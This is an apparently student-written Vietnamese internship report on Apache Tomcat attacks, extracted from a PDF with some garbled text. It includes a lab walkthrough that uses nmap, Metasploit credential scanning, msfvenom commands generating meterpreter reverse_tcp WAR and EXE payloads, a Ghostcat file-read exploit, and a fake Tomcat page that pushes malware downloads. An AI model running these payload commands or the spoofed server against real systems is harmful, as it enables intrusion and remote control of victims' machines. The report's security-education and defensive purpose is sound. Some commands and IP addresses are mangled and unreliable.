Cấu trúc của Apache Tomcat web serverApache Tomcat có nhiều ứng dụng và cung cấp nhiều tiện ích trong việc phát triển và Triển khai ứng dụng web Java: • Mơi trường phát triển và kiểm thử
Mục tiêu
- Khái quát về Apache Tomcat.
- Kịch bản tấn công các lỗ hổng trên Apache Tomcat.
Phương pháp nghiên cứu
Trong bài viết này, chúng tôi sẽ thu thập, khảo sát và phân tích các tài liệu liên quan đến Máy chủ ứng dụng Web Apache Tomcat Việc nghiên cứu này nhằm cung cấp cái nhìn sâu sắc về tính năng và ứng dụng của Apache Tomcat trong môi trường phát triển web.
- Về mặt thực nghiệm: Demo thực nghiệm các kịch bản khai thác lỗ hổng bảo mật trên Apache Tomcat (như đã trình bày ở phần lý thuyết bên trên
Báo cáo TTTN Đại học Chương I : Giới thiệu về Apache Tomcat
GIỚI THIỆU VỀ APACHE TOMCAT
Tổng quan về Apache Tomcat
Apache Tomcat is an open-source web application server developed by the Apache Software Foundation It serves as a servlet and JSP (JavaServer Pages) application server, providing a robust environment for running Java applications and facilitating the development and deployment of web applications.
Tomcat là một máy chủ ứng dụng chuyên dụng cho việc chạy ứng dụng web Java, bao gồm servlet và JSP Nó tuân thủ các tiêu chuẩn servlet và JSP, cung cấp môi trường thực thi tối ưu cho các ứng dụng web Java.
Với Tomcat, bạn có thể triển khai các ứng dụng web Java trên máy chủ độc lập hoặc kết hợp với các máy chủ web khác như Máy chủ HTTP Apache Tomcat hỗ trợ nhiều phiên bản của Java Servlet API và JavaServer Pages, cho phép phục vụ các yêu cầu web động và tạo nội dung động hiệu quả.
Apache Tomcat là một máy chủ ứng dụng web phổ biến, nổi bật với khả năng thu gọn, dễ sử dụng và hiệu quả cao, lý tưởng cho việc phát triển và triển khai các ứng dụng web Java.
Báo cáo TTTN Đại học Chương I : Giới thiệu về Apache Tomcat
Nguyễn Ngọc Tiểu Long - N19DCAT045 3
1.1.2 Ứng dụng về Apache Tomcat
Apache Tomcat là một máy chủ web phổ biến, hỗ trợ phát triển và triển khai ứng dụng web Java, cung cấp nhiều tiện ích hữu ích cho lập trình viên.
• Môi trường phát triển và kiểm thử: Tomcat cung cấp một môi trường phát triển và kiểm thử thuận tiện cho việc phát triển các ứng dụng web Java
Tomcat cung cấp các công cụ quản lý ứng dụng web, cho phép người dùng dễ dàng quản lý và cấu hình các ứng dụng đã triển khai trên máy chủ Bạn có thể thêm, xóa, cấu hình và theo dõi các ứng dụng một cách hiệu quả trong môi trường Tomcat.
Tomcat hỗ trợ cân bằng tải cho các ứng dụng web Java, giúp phân phối công việc hiệu quả và nâng cao hiệu suất Bằng cách cấu hình Tomcat cùng với các công nghệ như Apache HTTP Server, bạn có thể tối ưu hóa hoạt động của ứng dụng web.
Tomcat là một dịch vụ ứng dụng web độc lập, cho phép triển khai và chạy các ứng dụng web Java mà không cần phụ thuộc vào máy chủ web khác Điều này mang lại sự linh hoạt cho người dùng khi có thể hoạt động trực tiếp trên Tomcat mà không cần sự hỗ trợ từ bên ngoài.
Ưu điểm và nhượ c điểm c ủa Apache Tomcat
1.2.1 Ưu điểm của Apache Tomcat:
Apache Tomcat rất dễ sử dụng và cấu hình, với giao diện quản lý đơn giản và trực quan, giúp việc triển khai và quản lý các ứng dụng web Java trở nên thuận tiện hơn.
Tomcat là một máy chủ ứng dụng web nhỏ gọn, tiết kiệm tài nguyên và hiệu suất cao, có khả năng xử lý nhiều kết nối và yêu cầu web mà không làm quá tải hệ thống.
Tomcat tuân thủ các chuẩn servlet và JSP, giúp đảm bảo tính tương thích và di động cho các ứng dụng web Java trên nhiều nền tảng và máy chủ khác nhau.
Tomcat hỗ trợ nhiều phiên bản của Java Servlet API và JavaServer Pages (JSP), cho phép phát triển và triển khai ứng dụng web Java với các phiên bản Java khác nhau.
Tomcat sở hữu một cộng đồng phát triển mạnh mẽ và rộng lớn, được áp dụng phổ biến trong ngành công nghiệp Sự hiện diện này không chỉ đảm bảo hỗ trợ liên tục mà còn giúp Tomcat được cập nhật và phát triển đều đặn.
1.2.2 Nhược điểm của Apache Tomcat:
Tomcat có khả năng mở rộng hạn chế so với nhiều máy chủ ứng dụng web khác, điều này có thể gây khó khăn trong việc xử lý tải cao và phân phối công việc hiệu quả trên nhiều máy chủ.
Quản lý và giám sát Tomcat có thể trở nên phức tạp, đặc biệt trong các hệ thống lớn và phức tạp, mặc dù Tomcat cung cấp nhiều công cụ hỗ trợ quản lý ứng dụng web.
Tomcat có những hạn chế về tính năng so với nhiều máy chủ ứng dụng web khác, khiến một số tính năng phức tạp và tiện ích mở rộng không được hỗ trợ Để sử dụng các tính năng này, người dùng thường phải thực hiện cấu hình và tùy chỉnh phức tạp.
Báo cáo TTTN Đại học Chương I : Giới thiệu về Apache Tomcat
Nguyễn Ngọc Tiểu Long - N19DCAT045 5
Để phát triển và triển khai các ứng dụng web Java hiệu quả trên Tomcat, người dùng cần có kiến thức vững về Java cũng như kinh nghiệm trong việc quản lý máy chủ Java.
Mặc dù Tomcat cung cấp nhiều tính năng bảo mật, nhưng vẫn có thể xuất hiện lỗ hổng bảo mật nếu không được cấu hình và quản lý cẩn thận Do đó, việc đảm bảo an toàn cho ứng dụng web triển khai trên Tomcat là rất quan trọng.
Bảo mật của Apache Tomcat hiện vẫn còn tồn tại nhiều lỗ hổng, vì vậy việc nghiên cứu và tìm hiểu về các mối nguy hiểm liên quan đến Apache Tomcat là rất thiết thực và cần thiết Điều này nhằm mục đích khắc phục và củng cố nền tảng này ngày càng hoàn thiện hơn.
Báo cáo TTTN Đại học Chương II : Tìm hiểu các mô hình Apache Tomcat Exploitation
TÌM HIỂU CÁC MÔ HÌNH APACHE TOMCAT EXPLOITATION
Khái niệm về Apache Tomcat Exploitation
Khai thác lỗ hổng Apache Tomcat là quá trình tìm kiếm và lợi dụng các lỗ hổng bảo mật trong phần mềm máy chủ ứng dụng web Apache Tomcat, nhằm truy cập trái phép vào hệ thống, thực thi mã độc hoặc thực hiện các hành động tấn công khác.
Khi lỗ hổng trong Apache Tomcat được phát hiện, kẻ tấn công có thể khai thác nó bằng các công cụ và kỹ thuật, dẫn đến việc thực hiện các hành động độc hại như đánh cắp dữ liệu, tạo tài khoản giả mạo hoặc gây thiệt hại cho hệ thống và trang web.
Các kị ch b ản về Apache Tomcat Exploitation
Kỹ thuật tấn công khai thác lỗ hổng trên ứng dụng quản lý Apache Tomcat cho phép kẻ tấn công không được ủy quyền truy cập và tải lên mã độc lên máy chủ Tomcat Lỗ hổng này cho phép kẻ tấn công sử dụng tính năng tải lên tệp để thực hiện các cuộc tấn công nguy hiểm.
Quá trình khai thác lỗ hổng TOMCAT_MGR_UPLOAD bắt đầu bằng việc sử dụng công cụ tìm kiếm lỗ hổng để phát hiện các máy chủ Tomcat không được bảo mật Kẻ tấn công sau đó áp dụng các kỹ thuật như brute force hoặc chèn lệnh để xâm nhập vào ứng dụng quản lý Tomcat Manager và tải lên tệp độc hại Để ngăn chặn khai thác lỗ hổng này, quản trị viên hệ thống cần cài đặt bản vá mới nhất và thiết lập cấu hình bảo mật mạnh mẽ.
Báo cáo TTTN Đại học Chương II : Tìm hiểu các mô hình Apache Tomcat Exploitation
Nguyễn Ngọc Tiểu Long - N19DCAT045 7
Apache Tomcat Ngoài ra, họ cũng cần hạn chế truy cập vào ứng dụng quản lý Tomcat Manager, đặc biệt là truy cập từ xa.
Kẻ tấn công sử dụng các công cụ quét mạng để tìm kiếm các máy chủ web đang chạy trên nền tảng Apache Tomcat Manager Application
Sau khi xác định một máy chủ web hợp lệ, kẻ tấn công sẽ sử dụng các công cụ quét lỗ hổng để phát hiện các điểm yếu bảo mật trên máy chủ đó.
Kẻ tấn công đã chiếm quyền truy cập vào ứng dụng Apache Tomcat Manager, sau đó sử dụng các công cụ để tải lên mã độc vào máy chủ web.
Kẻ tấn công sử dụng các kỹ thuật thực thi mã độc từ xa để ực thi mã độc của mình th trên máy chủ web
Khi mã độc được thực thi, kẻ tấn công có khả năng thu thập thông tin nhạy cảm, điều khiển hệ thống từ xa và thực hiện các hành động phá hoại nhằm đánh cắp dữ liệu của nạn nhân.
2.2.1.3 Phòng chống Để bảo vệ hệ ống của mình khỏi các cuộc tấn công từ TOMCAT_MGR_UPLOAD, th người dùng cần phải áp dụng các biện pháp bảo mật vững chắc như cập nhật phần mềm, sử dụng mật khẩu mạnh, giám sát hệ ống, và triển khai các giải pháp bảo vệ đa th lớp.
Báo cáo TTTN Đại học Chương II : Tìm hiểu các mô hình Apache Tomcat Exploitation 2.2.2 TOMCAT_MGR_LOGIN
Hình 2.1 Mô tả của Tomcat Manager Login 2.2.2.1 Khái quát
TOMCAT_MGR_LOGIN là một kỹ thuật tấn công thường được sử dụng để tấn công vào ứng dụng web đang chạy trên nền tảng Apache Tomcat
Kỹ thuật tấn công TOMCAT_MGR_LOGIN tập trung vào giao diện quản lý của Apache Tomcat (Tomcat Manager), cho phép quản trị viên quản lý các ứng dụng web Giao diện này thường được bảo vệ bằng mật khẩu, nhưng nếu mật khẩu không đủ mạnh hoặc thông tin đăng nhập bị lộ, kẻ tấn công có thể lợi dụng lỗ hổng này để truy cập trái phép.
B1: Thu thập thông tin: Kẻ tấn công sử dụng các công cụ quét mạng để tìm kiếm các ứng dụng web chạy trên nền tảng Apache Tomcat
B2: Tìm kiếm tên người dùng và m t khậ ẩu:
Để đăng nhập vào giao diện quản lý Tomcat Manager, kẻ tấn công cần nhập đúng tên người dùng và mật khẩu Nếu thông tin xác thực chính xác, họ sẽ có quyền truy cập vào giao diện quản lý này.
B4: Thực hiện các cuộ ấn công khácc t
Báo cáo TTTN Đại học Chương II : Tìm hiểu các mô hình Apache Tomcat Exploitation
Nguyễn Ngọc Tiểu Long - N19DCAT045 9
2.2.2.3 Phòng chống Đặt mật khẩu mạnh: Sử dụng mật khẩu phức tạp, bao gồm các ký tự đặc biệt, chữ hoa và chữ thường, số và độ dài từ 8 12 ký tự -
Sử dụng giải pháp xác thực hai yếu tố như mã OTP, RSA SecurID hoặc xác thực bằng vân tay để nâng cao bảo mật cho giao diện quản lý Tomcat Manager.
Triển khai các giải pháp bảo vệ đa lớp là cần thiết để giảm thiểu nguy cơ tấn công vào Tomcat Manager Sử dụng tường lửa, hệ thống phát hiện xâm nhập (IDS/IPS), giám sát hệ thống và các giải pháp bảo vệ mạng sẽ giúp tăng cường an ninh và bảo vệ hiệu quả hơn.
2.2.3 APACHE STRUTS2 REST PLUGIN RCE
Hình 2.2 Mô tả Exploitation Rest Struts2 2.2.3.1 Khái quát
Lỗ hổng này cho phép kẻ tấn công thực hiện các cuộc tấn công Remote Code Execution (RCE) bằng cách tải lên và thực thi mã độc trên máy chủ web.
Kẻ tấn công có thể gửi yêu cầu HTTP đặc biệt để tải lên mã độc trên máy chủ web sử dụng Apache Struts 2 Khi payload này được thực thi, nó có thể gây ra những hậu quả nghiêm trọng cho hệ thống.
Trong chương II của báo cáo TTTN Đại học, chúng ta sẽ tìm hiểu về các mô hình khai thác Apache Tomcat Kẻ tấn công có thể chiếm quyền kiểm soát toàn bộ hệ thống, thực hiện các hoạt động độc hại như đánh cắp dữ liệu, thay đổi thông tin trên trang web, cài đặt phần mềm độc hại và nhiều hành vi khác.
Cập nhật lên phiên bản mới nhất của Apache Struts2 là rất quan trọng để khắc phục các lỗ hổng bảo mật, đặc biệt là để ngăn chặn các cuộc tấn công khai thác CVE-2017-5638 Ngoài việc cập nhật, các biện pháp bảo mật bổ sung như giới hạn truy cập vào các phương thức HTTP và xác thực các yêu cầu đến máy chủ web cũng cần được áp dụng để tăng cường an ninh cho hệ thống.
XÂY DỰNG VÀ TRIỂN KHAI CÁC MÔ HÌNH APACHE TOMCAT
Cài đặt mô hình
3.1.1 Cài đặt môi trường chạy
Trong bài viết này sử dụng môi trường máy ảo bằng Vmware Workstation với:
Máy chủ tấn công (Attacker machine) sử dụng hệ điều hành Kali Linux, một hệ điều hành dựa trên Debian GNU/Linux Kali Linux, phát triển bởi Offensive Security, được thiết kế đặc biệt cho các nhiệm vụ bảo mật mạng, kiểm thử xâm nhập và khai thác lỗ hổng hệ thống.
Máy bị tấn công (Target machine) sử dụng Metaploitable2, một máy ảo Linux có lỗ hổng cố ý, phục vụ cho việc đào tạo an ninh mạng Máy ảo này cho phép người dùng kiểm tra các công cụ bảo mật và thực hành các kỹ thuật kiểm tra thâm nhập phổ biến.
3.1.2 Cài đặt môi trường mạng Ở máy chủ tấn công sử dụng lớp mạng nội bộ (Vmnet3) với cấu hình:
Hình 3.1 Card mạng và lớp mạng sử dụng trong bài của máy Attacker
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Exploitation Ở máy bị tấn công sử dụng 2 card mạng Host only với Vmnet3 là card mạng chính:-
Hình 3.2 Card mạng và lớp mạng của máy Target Điều kiện tiên quyết: 2 máy phải cùng lớp mạng và cùng thấy nhau (ping được tới nhau)
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Nguyễn Ngọc Tiểu Long - N19DCAT045 17
3.1.3 Thực nghiệm mô hình TOMCAT_MGR_UPLOAD
Trước tiên, ta sử dụng máy Attacker để quét cổng máy Target bằng nmap: o Sử dụng lệnh: nmap -p 8180 -script vuln 192.168.10.133 (8180: port của service Apache Tomcat, )
Kết quả quét cổng 8180 bằng nmap cho thấy danh sách các thông tin trong thư mục admin, bao gồm các file html và jsp của Tomcat Apache Servlet Điều này chỉ ra rằng máy Target có thể bị khai thác để lấy thông tin nhạy cảm của admin.
Tiếp theo, chúng ta sẽ ực hiện hiện khai thác thông tin của Apache Tomcat củth a máy Target. o Sử dụng lệnh: nmap p 8180 sV 192.168.10.133- -
Hình 3.4 Xác định thông tin cổng và Version của dịch vụ Apache Tomcat
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Ta thu được kết quả : Apache Tomcat/ Coyote JSP engine 1.1
Khởi động Metaploit Framework trên máy Attacker và quét các modules có thể dùng để khai thác Apache Tomcat trên máy Target
Hình 3.5 Kết quả quét các Modules sẵn có trên Metaploit Framework dùng để khai thác Apache
Chọn module : auxiliary/scanner/http/tomcat_mgr_login để quét thông tin đăng nhập của admin
Hình 3.6 Kết quả ực hiện của Module Scan Tomcay_MGR_Loginth
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Nguyễn Ngọc Tiểu Long - N19DCAT045 19
Sau khi thực hiện scan: ta thu được kết quả: tomcat:tomcat là Username và Password của admin như sau:
Hình 3.7 Xác định được thông tin đăng nhập thành công
Tiếp theo chúng ta kiểm tra cài đặt của module này các field có required là thông tin bắt buộc phải điền:
Hình 3.8 Cài đặt thông tin cho Module Exploit Apache_MGR_Login
Có thông tin về địa chỉ ip, Username, Password của máy Target rồi chúng ta tiến hành tấn công.
Hình 3.9 Thực hiên và kết quả thu được khi exploit tới máy Target
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Exploitation Bây giờ chúng ta có thể xem và giám sát máy Target hoàn toàn:
Hình 3.10 Một vài lệnh khi exploit thành công vào máy Target
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Nguyễn Ngọc Tiểu Long - N19DCAT045 21
3.1.4 Thực nghiệm mô hình APACHE STRUTS2 PLUGIN RCE
Trong mô hình này chúng ta cần thu thập thông tin về máy chủ Apache Tomcat của máy Target trước: o Sử dụng lệnh : nmap sV 192.168.236.1- 29
Hình 3 Quét máy Target bằng nmap để khai thác thông tin về Hệ ều Hành và Http11 Đi
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Exploitation Sau đó, chúng ta truy cập server Apache Tomcat của máy Target, với mục Manager chúng ta cần thông tin đăng nhập như hình dưới:
Hình 3.12 Giao diện Apache Tomcat trên Browser Để tìm được thông tin đăng nhập, chúng ta có thể sử dụng module scanner của Metaploit Framework: TOMCAT_MGR_LOGIN
Hình 3.13 Thông tin về Module scanner Tomcat_MGR_Login
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Nguyễn Ngọc Tiểu Long - N19DCAT045 23 Để sử dụng module scanner chúng ta set thông số:
Hình 3.14 Quá trình thiết lập thông tin để ến hành Scanti
Sau đó, chúng ta thu được:
Hình 3.15 Kết quả Login thành công vào Server bằng Tomcat_MGR_Login
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Exploitation Thực hiện đăng nhập vào:
Hình 3.16 Dùng thông tin đăng nhập vừa mới quét được để Login vào Server
Tới đây, chúng ta sẽ nhắm đến phần Upload WAR file của trang Manager để tấn công
Hình 3.17 Xác định mục để Upload file WAR lên Server
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Nguyễn Ngọc Tiểu Long - N19DCAT045 25
Tới đây, chúng ta sẽ tạo file WAR chứa mã độc dựa trên .
Sử dụng lệnh: msfvenom p linux/x86/meterpreter/reverse_tcp -
LHOST2.168.236.128 LPORTD44 f war o exploit_tomcat.war- -
Hình 3.18 Quá trình tạo file WAR chưa mã độc Tiếp theo, chúng ta sẽ thực hiện upload và deploy file WAR này trên Apache
Hình 3.19 Các bước để ực hiện Upload file WAR lên Serverth
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Exploitation Đến đây, chúng ta sẽ sử dụng module exploit: exploit/multi/handler với các thông số để lắng nghe là thông số của máy Attacker như sau:
Hình 3.20 Quá trình thiết lập thông tin để ực hiện Exploit bằng reverse_tcpth
Tiếp đến chúng ta sẽ chuyển hướng trang đến routing là tên của file jsp
Hình 3.21 Lấy thông tin của file thực thi reverse_tcp thông qua routing URL
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Nguyễn Ngọc Tiểu Long - N19DCAT045 27
Sau khi đã truy cập vào địa chỉ như hình dưới, chúng ta sẽ lắng nghe được và hoàn thành exploit trên máy Target.
Hình 3.22 Thành công thực hiện exploit bằng reverse_tcp
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Exploitation 3.1.5 Thực nghiệm mô hình GHOSTCAT
Lỗ hổng này là dựa trên AJP để khai thác, do đó chúng ta cần phải xác định chính xác Port của nó:
Hình 3.23 Dùng nmap để xác định thông tin của dịch vụ AJP
Sau đó, chúng ta sẽ tiến hành tải Ghostcat-CNVD 2020- -10487 của tác giả 00theway để khai thác lỗ hổng GHOSTCAT
Dùng câu lệnh: git clone
Hình 3.24 Cấu trúc thư mục và cách thực thi ajpShooter
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Nguyễn Ngọc Tiểu Long - N19DCAT045 29
Xác định thứ tự câu lệnh trong bảng bằng tùy chọn help -
Giao diện chương trình Ajp Shooter cho thấy cấu trúc của một webapp hoạt động trên máy chủ Apache Tomcat Điều này cho phép chúng ta hiểu và khai thác thông tin từ file .
Hình 3.26 Cấu trúc cơ bản của một thư mục Website Project sử dụng Apache Tomcat
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Exploitation Thực : python3 ajpShooter.py http://:8180 8009 thi read
Hình 3.27 Kết quả là nội dung của một số file mà Ajp Shooter quét được
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Nguyễn Ngọc Tiểu Long - N19DCAT045 31
3.1.6 Thực nghiệm mô hình Apache Tomcat AJP
Chúng tôi sẽ xây dựng một server giả mạo Apache Tomcat bằng Python, cho phép người dùng tải xuống file chứa mã độc mỗi khi họ nhấp vào bất kỳ liên kết nào trên trang web này.
Chúng ta chuẩn bị ở đây 2 máy trong mô hình này gồm: Attacker (Kali Linux) và Target (Windows)
In this section, we will create a malicious file, specifically an exe file, using Meterpreter, while noting the IP addresses of the Windows target machine and the Kali Linux attacker machine as shown in Figure 3.28.
và hệ điều hành Windows.
▪ Sử dụng lệnh: msfvenom p windows/meterpreter/reverse_tcp - lhost2.168.236.128 lport65 -f exe -o ExploitTomcat.exe
Hình 3.29 Kết quả của quá trình tạo file mã độc định dạng exe trên máy Attacker dựa trên dạng
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Sau đó chúng ta cần phải thiết lập lại một chút ở cấu trúc thư mục và giá trị đường dẫn như hình dưới:
Hình 3.30 Các bước thiết lập lại URL Apache Tomcat giả mạo
Từ thông tin chúng ta quét được từ file index.html trong mô hình GHOSTCAT chúng ta tạo ra interface web y hệt với Apache Tomcat thật.
Hình 3.31 Nội dung file mxl chứa giao diện giả mạo
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Nguyễn Ngọc Tiểu Long - N19DCAT045 33
Sau đó, chúng ta sử dụng python3 để thông dịch và chạy file Tomcat_Clone.py
Hình 3.32 Thực thi file để ạy Server giả mạoch Trong bước thiết lập cuối chúng ta sử dụng exploit module: exploit/multi/handler để lắng nghe:
Hình 3.33 Quá trình thiết lập thông tin để ến hành exploitti
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Khi người dùng đứng ở web giả mạo này nhấp vào bất cứ thẻ nào thì ngay lập tức sẽ tự động tải về file ExploitTomcat.exe này.
Hình 3.34 Các kịch bản sau khi người dùng truy cập vào Server giả mạo
Sau đó, bất cứ khi nào người dùng chạy file ExploitTomcat.exe này lên thì chúng ta sẽ xâm nhập ngay lập tức vào máy nạn nhân.
Hình 3.35 Kịch bản người dùng chạy file chứa mã độc
Báo cáo TTTN Đại học Chương III : Xây dựng và triển khai các mô hình Apache Tomcat
Nguyễn Ngọc Tiểu Long - N19DCAT045 35
Sau khi xâm nhập thành công, chúng ta có thể xem thông tin về hệ điều hành và chụp hình màn hình ,… trên máy Target.
Hình 3.36 Kết quả sau khi thành công exploit máy Target
Báo cáo TTTN Đại học